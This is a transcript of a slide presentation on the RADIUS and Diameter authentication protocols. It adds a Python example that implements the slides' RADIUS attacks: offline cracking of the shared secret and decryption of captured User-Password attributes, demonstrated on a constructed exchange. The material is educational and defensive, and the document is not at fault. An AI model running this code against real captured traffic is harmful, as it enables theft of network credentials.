Transcript of Diameter and Radius
7/30/2019 Diameter and Radius
1/18
RADIUS & Diameter Protocol
Presented by:
Atul Kumar Srivastava (2017)
Vishal Sangale (2009)
Prashant Pandey (2004)
RADIUS - Introduction:
RADIUS is an application-level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS) and a shared authentication server.
A standardized protocol is required between the access server and the user-information repository in order to exchange authentication-, authorization- and accounting-related information. RADIUS was designed to provide a simple but efficient way to deliver such AAA capability.
Key features of RADIUS:
Client/server model
Network security: transactions between client and server are authenticated with a shared secret, and user passwords are not sent in the clear
Flexible authentication mechanisms
Extensible protocol
Terminology:
Service - what the NAS provides to the user, e.g. PPP or Telnet.
Session - each service provided by the NAS to a user constitutes a session, from the point where service is first provided to the point where it ends; a user may have several sessions in parallel or in series.
Silently discard - the implementation discards the packet without further processing (it should log and count the event).
Access-Request - the packet the NAS sends to the server to ask whether a user may be granted service.
Access-Accept - the server's reply when the user is authenticated and the request is accepted; it carries the configuration for the service.
RADIUS Overview:
Figure: User -> RADIUS Client: username and password; RADIUS Client -> RADIUS Server: Authentication Request; RADIUS Server -> RADIUS Client: Authentication Acknowledgement.
Authentication and Authorization:
Figure: RADIUS Client -> RADIUS Server: Access-Request frame; RADIUS Server -> RADIUS Client: Access-Accept, Access-Reject or Access-Challenge.
Accounting
Built-in accounting schemes:
Unix accounting: accounting data are stored in files and can be viewed with the radwho and radlast commands.
Detailed accounting: the detailed accounting information is stored in plain-text format, and the resulting files can easily be parsed with standard text-processing tools.
SQL accounting: the information is stored in an SQL database and processed with standard SQL queries.
RADIUS is extensible.
Packet Frame:
Details
Code (1 octet) - packet type: Access-Request, Access-Accept, Access-Reject, Accounting-Request, Accounting-Response, Access-Challenge
Identifier (1 octet) - matches a reply to its request
Length (2 octets) - length of the whole packet, 20 to 4096 octets
Authenticator (16 octets) - in a request, a random value (Request Authenticator); in a reply, the value used to authenticate the reply from the RADIUS server (Response Authenticator)
Attributes - the data, as type/length/value triples
Client Server Sequence
The NAS sends an Access-Request carrying the user information; the User-Password attribute is hidden by XORing it with MD5(shared secret + Request Authenticator).
The server answers with an Access-Accept carrying the IP address, network mask, allowed session time, etc.
The accounting phase starts with an Accounting-Request (Start).
When the user logs out, the accounting phase ends with the NAS sending an Accounting-Request (Stop) with some additional information, such as session duration and octets transferred.
The RADIUS server responds with an Accounting-Response once the accounting information has been stored.
Limitations
Response Authenticator based shared-secret attack
The attacker listens to requests and server responses and pre-computes the MD5 state over the part of the response that precedes the secret, MD5(Code+ID+Length+ReqAuth+Attributes); the Response Authenticator is that hash with the shared secret appended.
He then performs an exhaustive search on the shared secret, adding each candidate to the pre-computed MD5 state and comparing the result with the captured Response Authenticator.
User-Password attribute based shared-secret attack
The attacker attempts a connection to the NAS with a password he knows and intercepts the resulting Access-Request. Since User-Password = password XOR MD5(secret+ReqAuth), he can perform an exhaustive search on the shared secret offline.
User-Password based password attack
Perform an exhaustive or dictionary attack on a user's password: XOR each candidate with MD5(secret+ReqAuth), which the previous step revealed for that ReqAuth, and send it each time in the User-Password attribute of a forged Access-Request.
Possible because the Access-Request packet is not authenticated at all.
Limitations continued
Shared secret hygiene
Many deployments use one shared secret for every NAS, so the server effectively views them as a single client; a secret compromised on one device compromises all of them.
Short, human-chosen secrets (a small key size) make the exhaustive search easy.
Request Authenticator based attacks
Passive User-Password compromise through repeated Request Authenticators: if the NAS repeats a Request Authenticator, MD5(secret+ReqAuth) repeats, so XORing the two User-Password attributes yields the XOR of the two passwords.
Active User-Password compromise through repeated Request Authenticators: the attacker builds a dictionary of (ReqAuth, MD5(secret+ReqAuth)) as before. When he predicts that he can cause the NAS to use a certain ReqAuth, he tries to connect through it and intercepts the Access-Request, then decrypts other users' passwords sent under the same ReqAuth.
Replay of server responses through repeated Request Authenticators: the attacker builds a dictionary of ReqAuth, ID and the entire server response. When a later request reuses a stored ReqAuth and ID, the stored response is a valid reply to it. Most server responses will be Access-Accept.
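The packet layout, the Access-Request/Access-Accept exchange and the shared-secret, password and replay attacks from the two Limitations slides, carried out on a constructed exchange. This is an added example and not code from the presentation; the function names, the sample secret, user, password and word list are this example's own choices, and the packet layout and MD5 arithmetic follow RFC 2865.

```python
"""RADIUS (RFC 2865) packet mechanics plus the shared-secret and User-Password
attacks described on the slides.  Added example, not code from the slides; the
function names and the sample secret, user and password are this example's own."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2             # Code field values
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2        # attribute types
ATTR_FRAMED_IP_ADDRESS = 8

def xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

def encode_user_password(password, secret, req_auth):
    """RFC 2865 s5.2: NUL-pad to a multiple of 16, then c1 = p1 ^ MD5(S+RA), c2 = p2 ^ MD5(S+c1), ..."""
    padded = password.ljust(max(16, -(-len(password) // 16) * 16), b"\x00")
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = xor(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return out

def attr(attr_type, value):
    if len(value) > 253:                         # the Length octet also covers the 2-octet header
        raise ValueError("RADIUS attribute data is limited to 253 octets")
    return bytes([attr_type, len(value) + 2]) + value

def packet(code, ident, authenticator, attrs):
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs

def parse(pkt):
    """Return (code, identifier, authenticator, [(type, value), ...]); rejects bad lengths."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < 20 or length != len(pkt):
        raise ValueError("bad Length field")
    attrs, i = [], 20
    while i < length:
        t, l = pkt[i], pkt[i + 1]
        if l < 2 or i + l > length:
            raise ValueError("bad attribute length")
        attrs.append((t, pkt[i + 2:i + l]))
        i += l
    return code, ident, pkt[4:20], attrs

def build_access_request(ident, secret, user, password, req_auth=None):
    req_auth = req_auth or os.urandom(16)        # Request Authenticator: must be unpredictable
    hidden = encode_user_password(password, secret, req_auth)
    return packet(ACCESS_REQUEST, ident, req_auth,
                  attr(ATTR_USER_NAME, user) + attr(ATTR_USER_PASSWORD, hidden))

def build_response(code, request, secret, attrs=b""):
    """Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attributes+Secret)."""
    _, ident, req_auth, _ = parse(request)
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return packet(code, ident, hashlib.md5(header + req_auth + attrs + secret).digest(), attrs)

def verify_response(request, response, secret):
    """The NAS-side check: it binds the reply only to the Identifier and Request Authenticator."""
    _, ident, req_auth, _ = parse(request)
    _, rid, auth, _ = parse(response)
    expected = hashlib.md5(response[:4] + req_auth + response[20:] + secret).digest()
    return rid == ident and hmac.compare_digest(auth, expected)

def crack_secret_from_response(request, response, wordlist):
    """Response Authenticator attack: the MD5 state over Code+ID+Length+ReqAuth+Attributes
    is computed once; each guess only appends the candidate secret to a copy of it."""
    _, _, req_auth, _ = parse(request)
    _, _, auth, _ = parse(response)
    state = hashlib.md5(response[:4] + req_auth + response[20:])
    for guess in wordlist:
        h = state.copy()
        h.update(guess)
        if h.digest() == auth:
            return guess
    return None

def crack_secret_from_own_password(request, known_password, wordlist):
    """User-Password attack: the attacker logs in through the NAS with a password he knows,
    captures his own Access-Request, and tests MD5(guess+ReqAuth) against cipher[:16] ^ password."""
    _, _, req_auth, attrs = parse(request)
    target = xor(dict(attrs)[ATTR_USER_PASSWORD][:16], known_password.ljust(16, b"\x00"))
    return next((g for g in wordlist if hashlib.md5(g + req_auth).digest() == target), None)

def recover_password(request, secret):
    """Once the secret is known, every captured User-Password decrypts offline."""
    _, _, req_auth, attrs = parse(request)
    cipher, out, prev = dict(attrs)[ATTR_USER_PASSWORD], b"", req_auth
    for i in range(0, len(cipher), 16):          # undo the chaining block by block
        out += xor(cipher[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = cipher[i:i + 16]
    return out.rstrip(b"\x00")

if __name__ == "__main__":                       # demo with a short, guessable secret
    req = build_access_request(7, b"secret123", b"alice", b"hunter2")
    acc = build_response(ACCESS_ACCEPT, req, b"secret123", attr(ATTR_FRAMED_IP_ADDRESS, bytes([10, 0, 0, 5])))
    print(crack_secret_from_response(req, acc, [b"password", b"radius", b"secret123"]))   # b'secret123'
    print(recover_password(req, b"secret123"))                                             # b'hunter2'
```

The secret search costs one MD5 finalisation per candidate because the hash state over the captured bytes is copied rather than recomputed, which is the pre-computation the slide describes. The replay case follows from verify_response never looking at the request's attributes: a later Access-Request that reuses the same Identifier and Request Authenticator validates a stale Access-Accept.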
Diameter - Introduction
The Diameter protocol was derived from the RADIUS protocol with improvements in many aspects, and is generally regarded as the next-generation Authentication, Authorization, and Accounting (AAA) protocol.
The Diameter protocol is widely used in the IMS architecture for IMS entities to exchange AAA-related information.
Diameter nodes and agents
Diameter is designed as a peer-to-peer architecture: every host that implements the Diameter protocol can act as either a client or a server, depending on the network deployment.
Three types of Diameter agents
Relay Agent
A Relay Agent is used to forward a message to the appropriate destination, depending on the information contained in the message.
Proxy Agent
A Proxy Agent can also be used to forward messages but, unlike a Relay Agent, a Proxy Agent can modify the message content and therefore provide value-added services, enforce rules on different messages, or perform administrative tasks for a specific realm.
Redirect Agent
A Redirect Agent acts as a centralized configuration repository for other Diameter nodes. When it receives a message, it checks its routing table and returns a response message, along with redirection information, to the original sender.
Special agent
Translation Agent
In addition to these agents, there is a special agent called the Translation Agent. The responsibility of this agent, as you might have guessed, is to convert a message from one AAA protocol to another (for example, between RADIUS and Diameter).
Diameter packet format
(figure of the header and AVP layout; not captured in the transcript)
Comparison of Diameter and RADIUS protocols
Transport protocol - Diameter: connection-oriented (TCP and SCTP). RADIUS: connectionless (UDP).
Security - Diameter: hop-by-hop and end-to-end. RADIUS: hop-by-hop only.
Agent support - Diameter: Relay, Proxy, Redirect, Translation. RADIUS: implicit support only, meaning the agent behaviours might be implemented inside a RADIUS server.
Capabilities negotiation - Diameter: negotiates supported applications and security level. RADIUS: not supported.
Peer discovery - Diameter: static configuration and dynamic lookup. RADIUS: static configuration.
Server-initiated messages - Diameter: supported, for example re-authentication and session termination. RADIUS: not supported.
Maximum attribute data size - Diameter: 16,777,215 octets (24-bit AVP Length field). RADIUS: 255 octets (8-bit attribute Length field, which includes the 2-octet type/length header).
Vendor-specific support - Diameter: both vendor-specific messages and attributes. RADIUS: vendor-specific attributes only.
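The 24-bit AVP Length and the vendor-specific AVPs from the table, shown by building and parsing a Capabilities-Exchange-Request in which one AVP carries 1000 octets, more than a single RADIUS attribute can hold. This is an added example and not code from the presentation; the command code and AVP codes are RFC 6733 base-protocol values, while the vendor id 99999, the hop-by-hop and end-to-end ids and the host and realm names are hypothetical.

```python
"""Diameter (RFC 6733) message and AVP encoding, showing the 24-bit lengths and
vendor-specific AVPs from the comparison table.  Added example, not code from the
slides; vendor id 99999 and the sample host/realm are hypothetical, the command and
AVP codes are RFC 6733 base-protocol values."""
import struct

FLAG_R, FLAG_P = 0x80, 0x40                       # header Command Flags: Request, Proxiable
AVP_V, AVP_M = 0x80, 0x40                         # AVP Flags: Vendor-specific, Mandatory
CER = 257                                         # Capabilities-Exchange-Request command code
ORIGIN_HOST, ORIGIN_REALM, VENDOR_ID = 264, 296, 266

def avp(code, data, flags=AVP_M, vendor_id=None):
    """AVP Code(4) Flags(1) Length(3) [Vendor-Id(4)] Data, padded to a 4-octet boundary;
    Length counts header and data but not the padding."""
    hdr = 12 if vendor_id is not None else 8
    length = hdr + len(data)
    if length > 0xFFFFFF:
        raise ValueError("AVP Length is a 24-bit field")
    if vendor_id is not None:
        flags |= AVP_V                            # V flag says a Vendor-Id follows the length
    out = struct.pack("!IB", code, flags) + length.to_bytes(3, "big")
    if vendor_id is not None:
        out += struct.pack("!I", vendor_id)
    return out + data + b"\x00" * (-len(data) % 4)

def message(cmd, app_id, hbh, e2e, avps, flags=FLAG_R | FLAG_P):
    """Version(1)=1 Length(3) Flags(1) Command-Code(3) Application-ID(4) Hop-by-Hop(4) End-to-End(4) AVPs."""
    body = b"".join(avps)
    return (b"\x01" + (20 + len(body)).to_bytes(3, "big") + bytes([flags])
            + cmd.to_bytes(3, "big") + struct.pack("!III", app_id, hbh, e2e) + body)

def parse_message(buf):
    """Parse a Diameter message into a dict; length checks guard against truncated input."""
    if len(buf) < 20 or buf[0] != 1:
        raise ValueError("not a Diameter version 1 message")
    length = int.from_bytes(buf[1:4], "big")
    if length != len(buf):
        raise ValueError("Message Length does not match the buffer")
    app_id, hbh, e2e = struct.unpack("!III", buf[8:20])
    avps, i = [], 20
    while i < length:
        if i + 8 > length:
            raise ValueError("truncated AVP header")
        code, aflags = struct.unpack("!IB", buf[i:i + 5])
        alen = int.from_bytes(buf[i + 5:i + 8], "big")
        off = 12 if aflags & AVP_V else 8
        if alen < off or i + alen > length:
            raise ValueError("bad AVP Length")
        vendor = struct.unpack("!I", buf[i + 8:i + 12])[0] if off == 12 else None
        avps.append({"code": code, "flags": aflags, "vendor": vendor, "data": buf[i + off:i + alen]})
        i += alen + (-alen % 4)                   # skip the padding that Length excludes
    return {"flags": buf[4], "cmd": int.from_bytes(buf[5:8], "big"),
            "app": app_id, "hbh": hbh, "e2e": e2e, "avps": avps}

def build_cer(origin_host, origin_realm, vendor_id, private_data):
    """CER with three base AVPs plus one vendor-specific AVP (code 1 in that vendor's space)."""
    return message(CER, 0, 0x1001, 0x2001, [
        avp(ORIGIN_HOST, origin_host), avp(ORIGIN_REALM, origin_realm),
        avp(VENDOR_ID, struct.pack("!I", vendor_id)),
        avp(1, private_data, flags=0, vendor_id=vendor_id)])

if __name__ == "__main__":
    big = b"A" * 1000                             # more than RADIUS can carry in one attribute
    parsed = parse_message(build_cer(b"nas.example.net", b"example.net", 99999, big))
    for a in parsed["avps"]:
        print(a["code"], a["vendor"], len(a["data"]))
```

The padding rule is the usual source of parser bugs: the AVP Length excludes the padding, so a parser that advances by Length alone desynchronises after the first AVP whose data is not a multiple of four octets.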
Summary
RADIUS is a remote authentication protocol.
RADIUS is a de-facto standard for remote authentication.
RADIUS is an extensible protocol and can support many authentication methods (e.g. EAP).
RADIUS has several weaknesses:
Use of an MD5-based stream cipher to hide the User-Password
The Access-Request transaction is not authenticated at all
The RADIUS specification should require each client to use a different shared secret.
It should also require the shared secret to be a random bit string at least 16 octets long, generated by a cryptographically secure PRNG.
Diameter was brought in to replace RADIUS and fix some of these flaws:
Uses TCP (or SCTP)
Better transport-level security using IPsec (or TLS)
Cont.
In addition to SIP, Diameter is the other core protocol used in the IP Multimedia Subsystem (IMS) architecture, both in the service plane and the control plane. IMS defines a set of reference points between different IMS entities, and some of them use Diameter as the underlying protocol to exchange subscription-, presence- and billing-related messages. For example, the Sh reference point in IMS defines a set of Diameter messages for subscription and notification purposes.